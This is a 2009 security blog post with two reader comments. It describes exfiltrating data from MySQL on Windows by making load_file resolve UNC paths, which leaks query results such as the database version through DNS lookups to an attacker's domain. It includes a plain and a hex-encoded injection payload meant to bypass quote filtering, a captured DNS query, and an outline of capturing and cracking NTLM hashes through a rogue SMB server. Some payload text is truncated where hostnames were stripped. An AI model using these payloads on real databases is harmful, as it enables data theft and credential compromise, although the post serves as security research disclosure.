My SQL Exfiltrating Data Over Out Of Band Channels(OOB)

February 13, 2009

Exfiltrating data over DNS is nowadays a very popular technique. This technique has been well documented for MS-SQL and Oracle databases. I figured out that it is also possible to do the same under Mysql Windows installation.

Here’s how:

select load_file(concat(‘\foo.’,(select ‘test’),’’,’a.txt’));

This query will do a dns lookup for You need FILE privileges to call load_file function. It is quite common to find mysql running as ‘root’ user under windows installation(in connection string).

You can also use the hex encoding to bypass the magic quote restriction:

mysql> select load_file(concat(0x5c5c5c5c732e,(select concat((select mid(version

This resulted in the following DNS query:
05:20:36.349860 IP > yyy.yyy.yyy.yyy.53: 17495 A? (53)

The mysql version is 5.1.30-community

Now, mysql under windows runs as system(by default). If it was to run under any user account(e.g. administrator or a domian admin), then you can make it connect to your SMB server, send a pre calculated challenge(SMB challenge-response) and from the response obtained from the mysql server, you can then crack the NTLM session hash and thus obtain that user’s password.

I made a video demonstration of how to do it under ms-sql using xp_dirtree stored procedure, which i will post soon.




  • Reiners says:

    very nice 🙂 I remember playing with this before but I couldnt get it working at that time.

  • kuza55 says:

    Do you know what preconditions need to be satisfied for the app to start sending NTLM credentials? I assume they have to be domain joined, but is there anything else? And do you know how IE has fixed this to stop internet sites from getting user hashes?

    Given windows file functionality interprets UNC paths natively, this seems like something that could be utilised to hack a whole lot of other software…

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.